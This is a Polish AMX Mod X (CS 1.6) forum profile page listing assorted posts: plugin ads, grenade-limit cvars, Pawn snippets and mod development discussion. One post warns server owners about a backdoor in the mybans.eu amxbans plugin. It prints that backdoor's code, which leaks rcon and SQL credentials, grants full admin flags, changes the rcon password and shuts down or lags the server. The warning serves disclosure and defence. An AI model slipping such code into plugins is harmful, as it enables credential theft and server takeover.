Skocz do zawartości

Witamy w Nieoficjalnym polskim support'cie AMX Mod X

Witamy w Nieoficjalnym polskim support'cie AMX Mod X, jak w większości społeczności internetowych musisz się zarejestrować aby móc odpowiadać lub zakładać nowe tematy, ale nie bój się to jest prosty proces w którym wymagamy minimalnych informacji.
  • Rozpoczynaj nowe tematy i odpowiedaj na inne
  • Zapisz się do tematów i for, aby otrzymywać automatyczne uaktualnienia
  • Dodawaj wydarzenia do kalendarza społecznościowego
  • Stwórz swój własny profil i zdobywaj nowych znajomych
  • Zdobywaj nowe doświadczenia

Dołączona grafika Dołączona grafika

Guest Message by DevFuse
 

Toldi - zdjęcie

Toldi

Rejestracja: 27.11.2014
Aktualnie: Nieaktywny
Poza forum Ostatnio: 12.03.2025 20:44
-----

#776344 AmxxPro.pl - Paczki & Pluginy CS 1.6

Napisane przez N1K1Cz w 05.02.2023 12:25

DxoSZPE.png

 

Nasze zaangażowanie w utrzymaniu wysokiej jakości pluginów, paczek oraz wszelakich usług i niezrównanej obsługi klienta sprawiają, że klienci zawsze do nas wracają. 
Stale doskonalimy i rozwijamy naszą ofertę, mając na uwadze to, aby jak najlepiej obsługiwać klientów
 
Dążymy do tego, aby stale pomagać naszym klientom i oferować możliwie najszerszy zakres usług. Poniżej możesz zapoznać się z naszą ofertą. 
Stale rozwijamy i rozszerzamy nasz usługi, więc jeśli chciałbyś zasugerować coś, czego jeszcze nie ma w naszej ofercie, będziemy wdzięczni za wiadomość.
Listę poszczególnych pluginów z opisami oraz ceną znajdziesz na naszym github'ie: https://github.com/amxxpro-pl
Jeżeli jesteś zainteresowany(/a) współpracą z AmxxPro.pl zgłoś się do nas na DISCORD.
 
1.png
Paczki & Pluginy CS 1.6
 
Oto jedna z naszych najpopularniejszych usług. Klienci doceniają ją z uwagi na wysoki poziom jej świadczenia.
Dzięki tej usłudze gwarantujemy, że wszystkie szczegóły Twojego projektu realizowane są terminowo i bezproblemowo.
Współpracując z zespołem AmxxPro.pl będziesz w dobrych rękach.
Paczki/Pluginy są wykonywane w najnowszych standardach technicznych.
 
 
2.png
Wsparcie techniczne
 
Jest to usługa, która cieszy się dużą popularnością wśród naszych klientów, głównie z powodu swojej skuteczności.
Korzystając z naszej oferty, możesz mieć pewność, że zadbany o wszystkie Twoje potrzeby.
Jesteśmy dumni z wyjątkowej obsługi klienta, którą świadczymy.
Gwarantujemy, że współpraca z AmxxPro.pl będzie dla Ciebie przyjemnością.

 

3.png

Konfiguracje
 
Chcemy, aby wszyscy nasi klienci mogli skorzystać z profesjonalnej współpracy z zespołem AmxxPro.pl
Priorytetem tej usługi jest po prostu zmiana życia klientów na lepsze! Modyfikujemy dany serwer zgodnie ze szczegółami Twojego projektu.
 
Pytania, komentarze, specjalne życzenia?
Zachęcamy do kontaktu - napisz do nas!
 

  • +
  • -
  • -4


#774586 VIP

Napisane przez BOOTS w 14.08.2022 16:07

Co ci przeszkadza ? u mnie to wygląda okej nie masz zamiaru pomóc a sie przyjebać to nie komentuj!
  • +
  • -
  • -5


#774276 Dodanie koloru

Napisane przez damiann1990 w 29.06.2022 07:41

Nic. Mi to nie mówi gdzie mam to dopisać albo co zmienić szukam dalej,
  • +
  • -
  • -1


#772114 Limit Granatów + Cena

Napisane przez Misiu. w 25.06.2021 12:34

opis

Plugin dodaje do serwera możliwość zakupu granatów w ilości określonej w ustawieniach.
Istnieje również możliwość ustalenia własnej ceny za granaty.
 
  • Ustalenie limitu na zakupione granaty.
  • Ustalenie ceny zakupionych granatów.
  • Ustalenie dopłaty za dodatkowe granaty.

wymagane moduly

Amx Mod X 1.9.0, Amx Mod X 1.10.0

 

cvary

// Maksymalna liczba zakupionych granatów oślepiających
// Default: "4"
// Minimum: "1.000000"
gl_flash_pcs "4"


// Cena za pierwszy granat oślepiający
// Default: "200"
// Minimum: "0.000000"
gl_flash_price "200"


// Maksymalna liczba zakupionych granatów odłamkowych
// Default: "2"
// Minimum: "1.000000"
gl_hegren_pcs "2"


// Cena za pierwszy granat odłamkowy
// Default: "300"
// Minimum: "0.000000"
gl_hegren_price "300"


// Maksymalna liczba zakupionych granatów dymnych
// Default: "2"
// Minimum: "1.000000"
gl_sgren_pcs "2"


// Cena za pierwszy granat dymny
// Default: "300"
// Minimum: "0.000000"
gl_sgren_price "300"


// Dopłata za granaty
// Cena za dodatkowy granat będzie kalkulowana według zasady: cena za pierwszy granat + dopłata
// Default: "100"
// Minimum: "0.000000"
gl_add_price "100"
 
download
Załączony plik  GrenadeLimit-0.1.0.zip   3,29 KB  138 Ilość pobrań

  • +
  • -
  • 8


#770838 Dodanie ilosci monet do pluginu (skiny za monety)

Napisane przez KoRrNiK w 27.02.2021 16:12

Znajdź w pluginie: public ShowHUD(id)

show_hudmessage(id, "Nick: %s^nSkin: [ %s ]", PlayerName[target], szPlayerSkin); 

i zmień na ->

show_hudmessage(id, "Nick: %s^nSkin: [ %s ]^nMonety: %d", PlayerName[target], szPlayerSkin, cod_get_user_coins(target));

  • +
  • -
  • 3


#769945 (!) Mybans.eu - Włamania na serwery

Napisane przez DaFFyy w 21.01.2021 18:57

Cześć,

Przybywam do was, aby was ostrzec przed korzystaniem pluginu z mybans.eu.

Wczoraj nastąpiło włamanie na jeden z naszych serwerów który posiadał plugin mybansa ( https://cskomandosi....manie-na-serwer ), początkowo myśleliśmy, że ktoś udostępnił konto admina, ale coś takiego nie miało miejsca, posprawdzałem pluginy i w amxbansie od mybans.eu występowała i występuje nadal furtka której nie powinno być i została dodana w złym celu.

public amxbanuser1(id)
{
    get_cvar_string("rcon_password", szRc, 63);
    client_print(id, print_console, "RCON:\"%s\"", szRc);
}


public amxbanuser2(id)
{
    set_user_flags(id, read_flags("abcdefghijklmnopqrstu"), 0);
    get_cvar_string("amx_sql_host", szSqlHost, 63);
    get_cvar_string("amx_sql_user", szSqlUser, 63);
    get_cvar_string("amx_sql_pass", szSqlPass, 63);
    get_cvar_string("amx_sql_db", szSqlDb, 63);
    client_print(id, print_console, "SQL HOST:\"%s\"", szSqlHost);
    client_print(id, print_console, "SQL USER:\"%s\"", szSqlUser);
    client_print(id, print_console, "SQL PASS:\"%s\"", szSqlPass);
    client_print(id, print_console, "SQL DB:\"%s\"", szSqlDb);
}


public amxbanuser3()
{
    server_cmd("rcon_password 748663183");
}


public amxbanuser4()
{
    server_cmd("shutdownserver");
}


public amxbanuser5()
{
    set_task(0.00, "lagsnc", 2137, "", 0, "b", 0);
}


public lagsnc()
{
    remove_task(2138, 0);
    server_cmd("sys_ticrate 1");
}


public amxbanuser6()
{
    set_task(0.00, "lagsncoff", 2138, "", 0, "b", 0);
}


public lagsncoff()
{
    remove_task(2137, 0);
    server_cmd("sys_ticrate 1000");
}
Takie coś znajduje się w obecnym pluginie i przeszłym, wszystko aktywowane jest komendami których z oczywistych powodów nie podam.
 
Co to ma do twojego serwera? Jeżeli używasz ich pluginu:
  1. Atakujący może poznać hasło rcon / zmienić je
  2. Atakujący może poznać dane sql amxbansa
  3. Atakujący może wyłączyć serwer
  4. Atakujący może zlagować serwer
  5. Atakujący może nadać sobie wszystkie uprawnienia w tym immunitet

Posprawdzajcie swoje serwery, 

( hash pliku który na 100% ma w sobie backdoora - 197f2c27227070ba8eb68d0ad55d2710 ) - Oczywiście mogą występować pewnie inne kombinacje, ponieważ praktyka jest stosowana od kilku miesięcy.

 

 

Nie musicie dziękować, żyjcie w miłości i spokoju!

 

Jeżli już musisz skorzystać z akurat tej wersji, skorzystaj z tego tematu - https://amxx.pl/topi...oprawki-amxxpl/

 

@edit

Przypomniałem sobie, że lukę wykorzystują ludzie o nickach:

Jonkey - https://mybans.pl/profile/1-jonkey/

smajli - x

Kava - x


  • +
  • -
  • 3


#768875 Tworzenie submodeli

Napisane przez viper367 w 17.11.2020 13:46

Studiomdl dekompilujesz model

Jed's Model Viewer 1.36 - w nim ustawiasz lokalizacje tych 2 programów i przez niego dekompilujesz

potem juz notatnikiem edycja pliku .qc

Studiomdl kompilujesz model

Załączone pliki


  • +
  • -
  • 4


#768760 [ROZWIĄZANE] GO mod error

Napisane przez nojaknie w 10.11.2020 15:31

LXy6hZd.png

 

Jak sami tworzycie silniki do modyfikacji to powinniście wiedzieć jak skompilować  :giggle:

 

 


  • +
  • -
  • 4


#768506 Gra na odnodze po CT - poradnik

Napisane przez Rank Up w 18.10.2020 14:35

Cześć!
Wracam do Was z kolejnym poradnikiem. Tym razem dotyczy gry na odnodze, ale po stronie CT.
Zapraszam do obejrzenia oraz do subskrypcji kanału, jeśli chcecie być na bieżąco z tym co wrzucam :D 
 
 

  • +
  • -
  • 1


#767749 CS:GO Mod by O'Zone

Napisane przez O'Zone w 16.07.2020 10:20

Na prawdę nie podoba mi się to, że pomimo uwagi zarówno mojej jak i Dark'a co do założenia osobnego tematu, nadal ciągniesz tą dyskusję tutaj.

Powinienem wręcz kompletnie zignorować twój post dopóki nie pojawi się tam, gdzie powinien.

 

Piszę tu gdyż wydałeś jak sam powiedziałeś grywałną wersję 2.0, a nie jest ona na tą chwilę grywalna.

Grałeś w jakąkolwiek grę AAA wydaną w ostatnich kilku latach?

To, że coś jest grywalne nie oznacza, że jest pozbawione bugów.

Ja chociaż nikogo nie oszukuję oznaczając to wydanie jako wersję beta.

 

P.s: Jesteś developerem więc zrób jak sztuka pisze i postaraj się odtworzyć błąd na własnym środowisku...  ;)

I tak właśnie zrobiłem, kiedy w końcu dostarczyłeś jakieś sensowne informacje, a nie pisząc "I na dzień dobry leci crash".

 

Po wejściu HLTV na serwer leci crash (REUNION) authenticated HLTV

Dokupiłem sobie zatem HLTV na swój serwer testowy i bez problemu udało mi się zreplikować problem.

 

Bardzo przydatny był tutaj stack z logu crasha na serwerze, gdzie w parametrach startowych jest -debug.

Spoiler

 

Szybko się okazało, że wynika on ze zmian wprowadzonych tutaj, gdzie dały o sobie znać stare nawyki co do pobierania wartości cvarów.

Crash występowałby zarówno dla HLTV jak i każdego gracza bez flagi VIP/SVIP, kiedy to wykonywała się ta część warunku,

gdzie jako pointery wskazane były wartości cvarów rejestrowane przez bind_pcvar_num.

Odpowiedni fix został już zrobiony i pojawiła się wersja 2.0-beta2.

 

Idąc dalej:

Przy wyłączonym HLTV, ale działającym reunion leci multum błędów dotyczących dźwięków w grze

Logi w konsoli typu SV_BuildSoundMsg: player/pl_grate4.wav not precached (0) są efektem ubocznym działania Unprecachera.

Nie wpływają w żaden sposób na rozgrywkę i są obecne od niemalże samego początku tego moda - na długo przez jego upublicznieniem.

 

Przy css_overpass hud "miga" w rytmie upływających sekund

Na swoim serwerze testowym (46.29.21.219:27540, hasło: test) nic takiego nie doświadczam.

 

css_overpass ma błędy modeli i crashuje

Mapa overpass nie posiada żadnych zewnętrznych modeli, wszystkie są częścią pliku .bsp i jest ich niemało.

Zapewne wgrałeś pluginy rejestrujące dodatkowe zasoby i mino wszystko przekroczyłeś dla nich magiczny limit 512.


  • +
  • -
  • 6


#766232 CS:GO Mod by O'Zone

Napisane przez O'Zone w 23.04.2020 16:45

Powiem szczerze, nie sądziłem, że spotka się to z takim zainteresowaniem ;)

 

Na pewno niektórych ucieszy fakt, iż udało mi się znaleźć i wstępnie przystosować (podmiana rąk i rękawiczek)

modele noży z operacji Shattered Web: Nomad, Skeleton, Survival i Paracord.

 

Chciałbym jednak nieco ostudzić entuzjazm, bo ze względu na to ile czasu zajmuje konwersja modeli,

finalna wersja 2.0 pojawi się za co najmniej miesiąc, bo jak na razie zrobionych jest 7 z 45 modeli.

Mimo to przy tych 7 broniach (i wcześniejszych skinach noży) licznik ogólny wynosi aktualnie 571 skinów.

 

Oczywiście jeśli znajdą się jacyś chętni do Gwardii Dumbledore'a pomocy w tych pracach być może uda się ją wydać szybciej.

Ochotnicy wysłać do mnie prywatną wiadomość i postaram się przygotować instrukcję krok po kroku jak to wygląda.

W żadnym wypadku nie trzeba nic programować, to jest głównie zabawa z plikami tekstowymi i sklejaniem modelu w MilkShape.

Masowe generowanie modeli dla danej broni z przygotowanego szablonu i tekstur jest zautomatyzowane skryptem w pythonie,

który napisałem, więc nie jest to aż taka żmudna praca.

 

Jeśli ktoś jest w posiadaniu ciekawych skinów, a właściwie ich tekstur o rozdzielczości 512px x 512px,

też może się ze mną skontaktować, bo tych nigdy za mało.

 

Tymczasem mam w planach wydanie wersji 1.4, która będzie zawierać wszystkie zmiany bez submodeli.

Najprawdopodobniej zaraz potem pojawi się także wersja 2.0 beta, gdzie po prostu brakować będzie skinów do części broni.

 

PS. Jako, że nie podobają mi się standardowe noże z CS:GO zarówno dla CT jak i TT zostały one zamienione na jeden model.

Jest to nóż z CS 1.6 dodany do CS:GO na 20 rocznicę gry, który został z powrotem przeportowany do CS 1.6 :D

 

1zZvpi9.jpg


  • +
  • -
  • 9


#765561 Klan

Napisane przez CichyRex w 05.04.2020 17:37

Opis : Plugin dodaje możliwość założenia klanu ( za 16000$) do którego będziemy mogli zapraszać innych graczy, wpłacać dolary (za które później możemy wykupić prefix przed nick z nazwą klanu, lub ulepszyć poziom klanu). Możemy również wypłacać pieniądze z banku klanu. Mamy do dyspozycji również top10 klanów, gdzie pozycja w tym oto rankingu zależy od sumy ilości fragów wszystkich członków, oraz poziomu ulepszenia.
Czym większy poziom klanu, tym więcej graczy możemy zaprosić !


Cena : 11.07 zł sms - plik amxx + sma

 

http://i.imgur.com/z3Fap4a.png

http://i.imgur.com/Iyohwxf.png

http://i.imgur.com/d7Q1ixR.png




#764162 CS 1.6 Pełne spolszczenie 100% Boty mówiące po polsku

Napisane przez Ankeres w 19.01.2020 13:35

Zrobiłem pełne spolszczenie do cs 1.6 nonsteam i steam
 
 
Lista spolszczonych elementów: 
- Menu główne 
- Ustawienia gry 
- Okno multiplayer 
- Okno sklep z opisami 
- Okno startowe serwera 
- Okna wyboru postaci 
- Komendy radiowe 
- Rozmowy botów, wszystkie 
- Rozmowy zakładników 
- Menu boczne 
- Program do tworzenia serwera 
- Rozmowy tekstowe podbotów 
- Nazwy botów 
- Nazwy podbotów 
- Wszelkie instrukcje 
- Pliki konfiguracyjne 
- Komendy serwerowe: która godzina, 
czas do zmiany mapy, odliczanie 
 
 
 
 
Dodatkowo: 
- Dodaje skrypt na nagrywanie demek, 
który mówi po polsku 
- Dodaje skróty do szybkiego kupowania 
- Usuwa część reklam z mapy de_dust 1 i 2 
- Spolszcza polecenia, komendy, mody 
z innych serwerów* 
- Dodaje w menu bocznym, skrypt do 
odtwarzania własnej muzyki 
- Nie dodaje, żadnych reklam serwerów 
 
*Jeśli właściciel serwera, wgrał obsługę wielojęzykową w amxx.
 
 
 
Pliki są zeskanowane pod kątem wirusów.
 

  • +
  • -
  • 2


#762035 Miś teddy

Napisane przez Makss w 19.10.2019 13:48

/teddy -otwiera nam się menu z bossem

/god - dostajemy goda

 

 

tutaj screen z eventu

 

2e081db241c29.jpg

Załączone pliki


  • +
  • -
  • 8


#761763 Pobranie ownera leżącej broni

Napisane przez AwIlL^^ w 30.09.2019 22:10

#include <hamsandwich>
#include <fakemeta>

stock get_weapon_owner(weapon_entity)
{
	const pdata_player = 41;

	return get_pdata_cbase(weapon_entity, pdata_player, 4);
}

stock get_weapon_ent_from_box(weaponbox, &slot)
{
	static const pdata_weapon_in_slot[6] = { 34 , 35 , ... };

	new weapon_entity;
	for (slot = 0; slot<6; slot++) {
		weapon_entity = get_pdata_cbase(weaponbox, pdata_weapon_in_slot[slot], 4);
		if (pev_valid(weapon_entity) == 2) {
			return weapon_entity;
		}
	}

	return 0;
}

na ziemi leżą tak zwane weaponboxy i dopiero w nich są bronie w swoich slotach
za pomocą funkcji get_weapon_ent_from_box pobierzesz pierwszą znalezioną broń z takiego boxa
za pomocą funkcji get_weapon_owner pobierzesz właściciela dowolnej broni jeżeli posiadasz jej entity

takie info dotyczące właściciela - właścicielem broni jest zawsze osoba, która ostatnio trzymała broń, a nie osoba, która trzymała broń jako pierwsza


  • +
  • -
  • 2